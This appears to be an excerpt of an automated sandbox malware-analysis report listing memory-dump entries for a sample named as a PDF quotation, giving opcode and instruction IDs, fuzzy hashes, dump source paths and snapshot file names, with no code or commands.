                            • Opcode ID: 0b2d5dc9ce3b0bd83a2ef0bb368e61bb7e0533861a55f5c97f7da5ba37da1715
                            • Instruction ID: c44475c2746ded473ef16857d2118418aedb9c241a3e35f910fac788ecb457a5
                            • Opcode Fuzzy Hash: 0b2d5dc9ce3b0bd83a2ef0bb368e61bb7e0533861a55f5c97f7da5ba37da1715
                            • Instruction Fuzzy Hash: 8F519E34B006099FDB14EF68E498AAEBBB6FF88701F008559F5029B364DF749D06CB91
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cc2db8bae4a19308bfd2420e5c018433add21aaa976b45e74528da8b587e9359
                            • Instruction ID: e5a7790165084516549af4946723ec6d5ca2c5b12e3612354293f7b2b2ba049b
                            • Opcode Fuzzy Hash: cc2db8bae4a19308bfd2420e5c018433add21aaa976b45e74528da8b587e9359
                            • Instruction Fuzzy Hash: 0E41D471B04108CFD761CB69D844BAAB3F6FBC4328F2189B6D119CBA61D738AC45CB91
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d14c8035fcbee3f5f0fda7a8495223756b2478583debd08665da4192867db88b
                            • Instruction ID: 44428cae6809027fe3c2525936c2d88636ff4787ef6a43f111f24e1c9be9a809
                            • Opcode Fuzzy Hash: d14c8035fcbee3f5f0fda7a8495223756b2478583debd08665da4192867db88b
                            • Instruction Fuzzy Hash: CE41B230B106149FDB44EB68C894AAEB7BBEFC9700F114529E506AB354CF74AC06CFA5
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 053aae1708c50bb8abc0dcfc37666800062e8c0bdef9c5a935e35aebdabe0c09
                            • Instruction ID: 0c7db0aa1a4b9c4801dbdd57214b3c60ef7506e5007b50a1d97e931156fd7317
                            • Opcode Fuzzy Hash: 053aae1708c50bb8abc0dcfc37666800062e8c0bdef9c5a935e35aebdabe0c09
                            • Instruction Fuzzy Hash: CD518D36B10104DFD725CF6AD448BAABBE7EB89714F1880A9D406EB7A5CB389C41CB50
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 977535d5edbbe7d3ad179ce29d1f17c98db5eac181c7bf3bcd367b5748602afc
                            • Instruction ID: 8474690398abb3cf3d4a2d0d86f052067f7e654b24224fcf524739962691eea0
                            • Opcode Fuzzy Hash: 977535d5edbbe7d3ad179ce29d1f17c98db5eac181c7bf3bcd367b5748602afc
                            • Instruction Fuzzy Hash: AF418E36B10108DFD725DF6AD448BA9BBE7FB89704F1880A9D406EB3A5CB789C41CB50
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dd7a32896e7d362e8191e554cd8f7f313257f3de949898a4ac2e68a90d66ba4c
                            • Instruction ID: 95e5a82b27828702a71b4a5a8d30a7408a8ba1329456a99590e652eede8d1950
                            • Opcode Fuzzy Hash: dd7a32896e7d362e8191e554cd8f7f313257f3de949898a4ac2e68a90d66ba4c
                            • Instruction Fuzzy Hash: 5441E330B04291CFD726DB3DD8582697BB3AFC6329F18C4BAD0459B295DB398846CB61
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ba8c6813759231884a2938cf472d3c56d52fcd56858d378530954facde6ca5ae
                            • Instruction ID: e3234a73acef655d304ef208aacbffab3d2b7f8cadb9e21882739062ab628cdb
                            • Opcode Fuzzy Hash: ba8c6813759231884a2938cf472d3c56d52fcd56858d378530954facde6ca5ae
                            • Instruction Fuzzy Hash: 4F419A31B00B159FCBA0DB68E54069EB7F2AF84710B04896ED65AD7B80DB30ED41CB85
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3b75fd6474efcc98e08cf66644ba776534e45d901b006b93c509250ece9a9d1d
                            • Instruction ID: c8d14c933a759bafab58ec130e486696926804c09ec61765765fc0d6a4a0d793
                            • Opcode Fuzzy Hash: 3b75fd6474efcc98e08cf66644ba776534e45d901b006b93c509250ece9a9d1d
                            • Instruction Fuzzy Hash: B361FA74D04628DFDBA5CF29C980BD9BBF5AB49300F5081EA994DA7310D7319E85CF90
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aa222c646ebb0320b1044487fe917885e029f607cba22ba561a34c4af37c93e8
                            • Instruction ID: 42fb3a4767c4c29c6f0392b076abfa4cad103d5c62e0f35caee0bcccac34f863
                            • Opcode Fuzzy Hash: aa222c646ebb0320b1044487fe917885e029f607cba22ba561a34c4af37c93e8
                            • Instruction Fuzzy Hash: 91418D713406149FD308DB69C854B2A77EAAFCCB04F114468E64A8B3A1CF75EC42CBA4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 297c541d8fc2d6fbeac6c1c9cff8792174ce03dd6c97ddbc5d999fdc53fb8d61
                            • Instruction ID: 38b646408e13290c17765674217277e98b87aaf9cd9b0ad6aca2469ff20451f4
                            • Opcode Fuzzy Hash: 297c541d8fc2d6fbeac6c1c9cff8792174ce03dd6c97ddbc5d999fdc53fb8d61
                            • Instruction Fuzzy Hash: 7A418D34A062548FDB62CB24CDA1F99BBB1FF4A311F1501D6EA45AB3D2C6319D81CF50
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a823f3a368b1e701192312e09cffe0528c55acc22555b7a8c34f0e6e933f7faa
                            • Instruction ID: 3f731fd756314b11dd3c69da0f6fd4183577bf617fd1a069c8599abe5fd54279
                            • Opcode Fuzzy Hash: a823f3a368b1e701192312e09cffe0528c55acc22555b7a8c34f0e6e933f7faa
                            • Instruction Fuzzy Hash: 203169713406149FD348DB69C858B2A77EAAFCCB04F114468E60A8B3A1CF75EC42CBA4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7409570915545602ed7c7c3904913383698334dec1e4e9c86fe2a6f9da6f2a4e
                            • Instruction ID: 62a8245dad061ed146f68abb49fc33e5a735c02f94236900a83cf13c44083b91
                            • Opcode Fuzzy Hash: 7409570915545602ed7c7c3904913383698334dec1e4e9c86fe2a6f9da6f2a4e
                            • Instruction Fuzzy Hash: 4331F6353003048FCB289F38E454A6A7BA6EFC9725765856DE55ACB391DF31DC02CB94
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e5a9b5b9e9781081b71b50673cd09c9b48fdeb325d2c738b852bc9a85e04641c
                            • Instruction ID: f07bfee9c0cbee3f803222be690ef06af939ba470dd7b56a1572788da5de6765
                            • Opcode Fuzzy Hash: e5a9b5b9e9781081b71b50673cd09c9b48fdeb325d2c738b852bc9a85e04641c
                            • Instruction Fuzzy Hash: 3D31F3366001089FCB45DF98D888E99BBB2FF48321F0680A8FA099B372C735ED55DB40
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: caa7131dae59ee7a95d9168d1bdb29330aca945e32b88535308359ee889fec54
                            • Instruction ID: f23fbf5a2e9565ee6d4e2c6e49a2be68ba82d9afc6a834062795d8fd78544495
                            • Opcode Fuzzy Hash: caa7131dae59ee7a95d9168d1bdb29330aca945e32b88535308359ee889fec54
                            • Instruction Fuzzy Hash: 8131E130609286CFD726CB68D848759BBB2FF81308F1984F6D606DB6A6D73CAC45CB51
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8600be1a5482f90d8929eeb076ebc2872a9580ba71b5c54bb2d12700689e721a
                            • Instruction ID: 37ec17136cd7dd5c7c69ad4d5d233103df44db1c17907d6743b14c43bdf6f23d
                            • Opcode Fuzzy Hash: 8600be1a5482f90d8929eeb076ebc2872a9580ba71b5c54bb2d12700689e721a
                            • Instruction Fuzzy Hash: 10313D35A101189FDF14DBA4D854AEEB7B6FF88311F20802AE902B7390DB359D15CBA4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2ab5870ebb9a44b2be0eb50b6f46eaeae95d38f3d3ad8155e95cde246c0205ef
                            • Instruction ID: c9e9d9f422e3cf9510ee8560cfbce9e74f29ba2cb12874939be6d29a1f223790
                            • Opcode Fuzzy Hash: 2ab5870ebb9a44b2be0eb50b6f46eaeae95d38f3d3ad8155e95cde246c0205ef
                            • Instruction Fuzzy Hash: B0511874E45629DFDB65CF29C980BD9BBF5AB49300F0081EA994CA7310E7319E81DF80
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bf82a20a15ddaa0c80812fe4a82bd9e1ebaf9f304fece6f3159ee1d0dab14416
                            • Instruction ID: 24adfc4bce673cdc79575ab1156f61a1a586ec9ec90a996f5f20da9e90e998a1
                            • Opcode Fuzzy Hash: bf82a20a15ddaa0c80812fe4a82bd9e1ebaf9f304fece6f3159ee1d0dab14416
                            • Instruction Fuzzy Hash: FB31D1357002049FCF058F54D844A5ABBB6FF8C310F1584A9FA099B362CB71DC52CB90
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b1bdb5655a20b83632c617848f8dfb3218988e23592bafadd3d6d4686c4258de
                            • Instruction ID: 9c88e3fcabdcc271f59bcce689c2301d435680eb9fc578e43c838f4a9add0922
                            • Opcode Fuzzy Hash: b1bdb5655a20b83632c617848f8dfb3218988e23592bafadd3d6d4686c4258de
                            • Instruction Fuzzy Hash: F431F430614288DFE766CF69F8547AA7BB7EB82318F18C1BAC405C7592C73D6941CB11
                            Memory Dump Source
                            • Source File: 00000000.00000002.1916805899.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_12dd000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 27db67c674a56ffea6815cddc6f33b35fe0e9d3249f6eedaf952cb840d78df88
                            • Instruction ID: 9250febde18d5116815f150344dabccc8b05b0efa8ded3b552c585bb64bb05ef
                            • Opcode Fuzzy Hash: 27db67c674a56ffea6815cddc6f33b35fe0e9d3249f6eedaf952cb840d78df88
                            • Instruction Fuzzy Hash: E6318D7150E7C48FCB038F64D990701BF71AF87214F2981DBD9898F1A7C229980ACB72
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8a101ce767dc1c6f98419a599501d17b1a8add6eb011353b6048f21bc40e6fca
                            • Instruction ID: d6520ecf30075eca26daa0a02d82fe0b2c030ea0465afbd1d059ce0e1ab39440
                            • Opcode Fuzzy Hash: 8a101ce767dc1c6f98419a599501d17b1a8add6eb011353b6048f21bc40e6fca
                            • Instruction Fuzzy Hash: 822107313052105FD7249B6DE884A56BBEAEFC5329B1684BAE64ECB342DB30EC41C765
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 365a904dedbef2cb244cd5f76f530b1ff54bd4992ffb7c70d66b9322f8d59e08
                            • Instruction ID: 5af056c9ff5ef6503d30de894212568c21e250f14bcaa07dd405175fb4b63228
                            • Opcode Fuzzy Hash: 365a904dedbef2cb244cd5f76f530b1ff54bd4992ffb7c70d66b9322f8d59e08
                            • Instruction Fuzzy Hash: FE318D312002459FDB55CF29D884AAA7BB6FF84305F1685A9FD05CB3A1CB74DC91CB50
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fc13b42959b473e7138b0c97525ff246e73b02c02f53de6e8d46378fd3f3cf74
                            • Instruction ID: 039c0f38e2ace9ac79b5dbc08c550dc96c3b73a153a517d93ce08c1dbcce3061
                            • Opcode Fuzzy Hash: fc13b42959b473e7138b0c97525ff246e73b02c02f53de6e8d46378fd3f3cf74
                            • Instruction Fuzzy Hash: 35313C70E05518CBDB28CF6AD8447DDB7B6FB8A300F10A0AAC849A3341DB349D81CF50
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 701bccb6fa52977df67970dcf506504ead00fd07f5f20ce3532d81a5b854527a
                            • Instruction ID: 76774b55411250be51a3ad8fa366d3506cb1c26fff790022a40946c0072065e3
                            • Opcode Fuzzy Hash: 701bccb6fa52977df67970dcf506504ead00fd07f5f20ce3532d81a5b854527a
                            • Instruction Fuzzy Hash: 90312870D002489FDB24CFAAC594BDEBFF5AF48710F24841AE809AB350DB399945DFA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: efaa9a6ccd78e0e3a46a4ab27c4b59ea8ce574bbe851bd8116c13224cc9aa26a
                            • Instruction ID: 5d19ce771ff67dfd698671f7e05973825ddd076bc4b10a271c78d510c7a8e3fb
                            • Opcode Fuzzy Hash: efaa9a6ccd78e0e3a46a4ab27c4b59ea8ce574bbe851bd8116c13224cc9aa26a
                            • Instruction Fuzzy Hash: F9311770D002489FDB24CFAAC594BDEBFF5AF48710F24841AE909AB350DB799945DFA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: af50cf5f654936525159c7006ce6f508e78f10c2596c9f69ad71c29c5bc93c83
                            • Instruction ID: a278cfc7abac9ff7469ffa2c47c1586f4a98866fce9f758f4e041581732caffa
                            • Opcode Fuzzy Hash: af50cf5f654936525159c7006ce6f508e78f10c2596c9f69ad71c29c5bc93c83
                            • Instruction Fuzzy Hash: D6212A313042859FDB42CF6AC844AAA7FE5AF8A314B0A8096FD45CB371DB75DC61CB60
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 46f5159ee74bb34074175436b4229ac11835d0a7fbcb57bdb7b11b6503274817
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3dd518992d82f315affaff10b57637116cc35ecb80d8fd98f04591846d72afab
                            • Instruction ID: 96332265ee3ccdfb50df1963d95a91c7a39e89f836156cede7fbb40549bd5464
                            • Opcode Fuzzy Hash: 3dd518992d82f315affaff10b57637116cc35ecb80d8fd98f04591846d72afab
                            • Instruction Fuzzy Hash: 4401142200E3D19FD30787B41D314A67F759C1316832E01C7DAC9CA0A3D6158D39D3B2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 09dc3241065d999b78e859f2e57602301d5b8c994dd4121d2c8b1addb0c217ce
                            • Instruction ID: 105c47a26be4706fc496762447bee5e056d0cea8ee1fca3fdcd1a79eaf711782
                            • Opcode Fuzzy Hash: 09dc3241065d999b78e859f2e57602301d5b8c994dd4121d2c8b1addb0c217ce
                            • Instruction Fuzzy Hash: 750144B2F146104FDB589B7CE81866D37F5BFD852931144AAE50ACB360DF39CC014B54
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ebe3d08f3a27634fa96fb685f7762d9591ca0f9375fb4c29e9933711e4d07ee6
                            • Instruction ID: cccc6634cab0bf477c683216c58ad305a2148873be6d31ae1df67b2f1c5f2337
                            • Opcode Fuzzy Hash: ebe3d08f3a27634fa96fb685f7762d9591ca0f9375fb4c29e9933711e4d07ee6
                            • Instruction Fuzzy Hash: 29014C76B102108FC758DBB8E4689693BF5EFCD61531104E9E546CB365EE78CC018BA1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1941165349.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_8a40000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 858289264092bb9c96370139b9bb2ea4c16351628a1bc622f2f8474ab2e896e7
                            • Instruction ID: 0010da8aa3a7c2d731ada79f8330924b84fb5f51af0c0833c0cfe273ec8764f3
                            • Opcode Fuzzy Hash: 858289264092bb9c96370139b9bb2ea4c16351628a1bc622f2f8474ab2e896e7
                            • Instruction Fuzzy Hash: 0721C2B4E05229CFDB65DF18C948BA9B7B4FB8A301F0050E9D90DA7A40D7386E82DF01
                            Memory Dump Source
                            • Source File: 00000000.00000002.1941165349.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_8a40000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bc9606b98a8ad9973c0aa4993a2e718d1386b9816f9902ec30cd4bc57fcd9005
                            • Instruction ID: 3d9032c18d4f07b159ec5a0b7ccedc54b7c7be99a1d37129531eb94a19b0cf27
                            • Opcode Fuzzy Hash: bc9606b98a8ad9973c0aa4993a2e718d1386b9816f9902ec30cd4bc57fcd9005
                            • Instruction Fuzzy Hash: 7111F3B4E0020A9FDB44DFE9C8457BEBBF1FF89200F20856A9518A7354EB349A418B95
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2a6dd2051188f4950de71962a7670f031ba1e4ec910c1b4bfb2d4f119bb40582
                            • Instruction ID: 391188f507a381a018324065d136b752f7d97c538d52d135b2793299e4930725
                            • Opcode Fuzzy Hash: 2a6dd2051188f4950de71962a7670f031ba1e4ec910c1b4bfb2d4f119bb40582
                            • Instruction Fuzzy Hash: D801BC353046409FC30A9F34D02496ABBB3EFCA711B1041A9E9468B391CF35DCA2CBA4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 085dd9002082e91c64b12fef550a9235592aebcc50818a29f6e8f6c3db1b9219
                            • Instruction ID: 8985e400dfc3d00e947cc0e6493877e7b919e57682dcd163aa1577c71cd87f09
                            • Opcode Fuzzy Hash: 085dd9002082e91c64b12fef550a9235592aebcc50818a29f6e8f6c3db1b9219
                            • Instruction Fuzzy Hash: 2001B172C00A49DFCB10EFA4E8016DDB7B5EF96324F1081AAC518A7640EB31EA95CBC5
                            Memory Dump Source
                            • Source File: 00000000.00000002.1916776151.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_12cd000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 787f3088e012d91da01326f5102a581f7bedb0df4254ade0f53db29576abc811
                            • Instruction ID: 28bd362c2d96acd312a71af5f50a793b2dcbc77aa3a43533d733b62157ae57bf
                            • Opcode Fuzzy Hash: 787f3088e012d91da01326f5102a581f7bedb0df4254ade0f53db29576abc811
                            • Instruction Fuzzy Hash: 4601F7311143889FF7148A55CD84B67BBD8EF85A20F18C57DEF090A182C3789848CAF2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4ace6ef162fe91f9bb9f014026d2e2831b1120ba9f86659a0bc9cfce42f8809e
                            • Instruction ID: 2d8c89cad6ed529fda20d1ea52da73c460b7aa4a5dbbeeab3a84633478b3de44
                            • Opcode Fuzzy Hash: 4ace6ef162fe91f9bb9f014026d2e2831b1120ba9f86659a0bc9cfce42f8809e
                            • Instruction Fuzzy Hash: 3F01B1307002049FC728DB24D454A2A77A3EFC9320F15856DE6564B790CB75EC42DB98
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3e2f5604366cc788f8ac39a4bce51396d99d180e7a16bec7a7dd8af1f4fdc504
                            • Instruction ID: 8ed46a758126213e5a226e8ba18cf87a06c357545771ce3ebbbd78d36149d6ba
                            • Opcode Fuzzy Hash: 3e2f5604366cc788f8ac39a4bce51396d99d180e7a16bec7a7dd8af1f4fdc504
                            • Instruction Fuzzy Hash: 04F08B317100496BDB158B29C8848AAFFAAEFC5324F198066EA15DB362DF309C13D790
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 955c9d0ec5407517a1eb2a9d2f99c8236b279020221a4ffb52502a5b101fd8bb
                            • Instruction ID: c365f36f9cbd3a88a757dacbe86897e69799725b9e02f4963eae58e729c23349
                            • Opcode Fuzzy Hash: 955c9d0ec5407517a1eb2a9d2f99c8236b279020221a4ffb52502a5b101fd8bb
                            • Instruction Fuzzy Hash: B7F0C976B502108FC758EB78E85C96937FAAFCC62531104E8E50ACB365EF78DC408BA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1941165349.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_8a40000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
